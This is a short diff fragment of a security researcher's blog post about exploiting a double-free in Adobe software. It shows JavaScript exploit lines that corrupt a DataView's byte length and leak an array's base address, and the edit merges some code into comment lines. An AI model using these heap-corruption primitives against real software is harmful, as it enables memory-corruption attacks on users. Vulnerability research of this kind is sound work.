sourceincite/sourceincite.github.io/_posts/2018-05-21-adobe-me-and-a-double-free.md

                     // set its byte length to a stupid number also mydv.setUint32(mypos - 0x10, 0x100000, true);

-                    // leak the base of myarray
-                    myarraybase = mydv.getUint32(mypos, true);
+                    // leak the base of the myarray Array myarraybase = mydv.getUint32(mypos, true);
 ```